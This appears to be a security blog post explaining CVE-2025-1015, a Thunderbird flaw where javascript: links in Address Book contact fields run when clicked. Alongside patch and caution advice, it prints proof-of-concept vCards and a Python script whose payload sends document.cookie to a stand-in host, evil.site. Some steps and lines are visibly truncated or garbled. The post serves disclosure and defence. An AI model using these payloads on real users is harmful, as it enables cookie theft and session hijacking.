CVE-2025-1015 - How Malicious Address Book Links Threaten Thunderbird Users – Full Breakdown

Thunderbird users have always trusted their email client for strong privacy and security. But recently, a critical vulnerability was discovered — tracked as CVE-2025-1015 — that exposes users to the risk of malicious JavaScript running right inside Thunderbird, all because of unsanitized links lurking in the Address Book.

In this exclusive deep dive, we’ll explain what happened, how attackers can abuse this vulnerability, and show you code snippets that demonstrate real-world exploitation. If you use Thunderbird, read on to understand the risk and how to protect yourself.

What is CVE-2025-1015?

Put simply:
Unsanitized links in Thunderbird Address Book URI fields can carry malicious payloads. If you import someone else's malicious address book and click the wrong link, you could end up executing untrusted JavaScript code right within Thunderbird.

Thunderbird versions below 135

This affects both ESR and recent releases.

Quick Reference

- Mozilla Security Advisory — CVE-2025-1015
- Thunderbird Release Notes

How Does the Attack Work?

Thunderbird's Address Book lets you add contact fields, including the “Other” field in Instant Messaging. The vulnerability comes into play because Thunderbird did not sanitize URIs (web addresses) stored in these fields.

An attacker could create and distribute a contact book where one of the fields (like “Other”) contained a link like:

javascript:alert('Hacked!')

Or a more advanced payload, as you’ll see below.

Victim: Clicks a link embedded in the address’s “Other” field.

4. Thunderbird: Opens a tab/window and executes the unsanitized JavaScript.
5. Result: Potential data theft, session hijacking, or phishing—while code runs unprivileged, it can still be harmful.

Proof-of-Concept: Exporting and Importing a Weaponized Contact

Here’s exactly how an attacker might build the payload, and what a victim might see.

1. Crafting a Malicious vCard

A vCard is a standard contact-sharing format.

Here’s a snippet with a malicious “Other” field

BEGIN:VCARD
VERSION:3.
FN:Malicious Actor
X-INSTANT-MESSAGING-OTHER:javascript:alert('CVE-2025-1015 Exploit!')
EMAIL:badguy@example.com
END:VCARD

2. Distributing the Trap

The attacker sends this .vcf file to the victim, inviting them to import contacts.

3. Import and Activation

When the victim imports and clicks on the “Other” field in the UI, Thunderbird opens a browser-like page and executes the JavaScript.

Screenshot (Simulated)

+---------------------+
| Malicious Actor     |
| other: [Link]       |
+---------------------+

[Click] --> Runs alert('CVE-2025-1015 Exploit!')

Attempt privilege escalation via chained vulnerabilities

*(None currently reported, but possible in theory)*

Example full payload

X-INSTANT-MESSAGING-OTHER:javascript:fetch('https://evil.site/?c='; + document.cookie)

Technical Details: Why Did This Happen?

Thunderbird did not apply proper input validation or link sanitization to URI fields in address book entries. Links beginning with javascript: should have been filtered, but they were not.

The issue was flagged by security researchers who noticed that JavaScript URIs were being treated just like safe HTTP/HTTPS links when clicked in Thunderbird's interface.

Thunderbird 135 and above

Fix: Sanitization now strips out “javascript:” URIs and other non-HTTP(S) protocols from contact fields.

Patch Reference (hg.mozilla.org)
*Note: Commit ID and URL may differ depending on updates.*

Attacker: Creation of malicious address book

vcf = """
BEGIN:VCARD
VERSION:3.
FN:Victim Name
X-INSTANT-MESSAGING-OTHER:javascript:fetch('https://evil.site/steal?c='+encodeURIComponent(document.cookie))
EMAIL:victim@example.com
END:VCARD
"""

with open("exploit_contact.vcf", "w") as out_file:
    out_file.write(vcf)

Update Thunderbird to the latest version right now:

https://www.thunderbird.net

Be highly suspicious of shared address books, especially from unknown sources.

- Don’t click links in contact fields unless you trust the sender and you’re on a patched email client.

References

- CVE-2025-1015 at NVD
- Thunderbird Security Advisories
- Mozilla Bugzilla — Bug 1876505 (Restricted/Details Hidden Until Patch)
- Thunderbird Download Page

Bottom Line

CVE-2025-1015 is a reminder: even trusted software can have surprising weak spots.
Importing someone else’s address book might seem safe, but a single careless click could open you up to code execution—even if only in an “unprivileged” page. Update today, and stay skeptical of contact data from outside your organization.

Have you patched yet?

Share this article to alert your teammates and friends!

*This exclusive post was written for security-conscious Thunderbird users. Reproduction allowed with credit. Stay secure!*

Timeline

Published on: 02/04/2025 14:15:32 UTC
Last modified on: 03/10/2025 19:15:39 UTC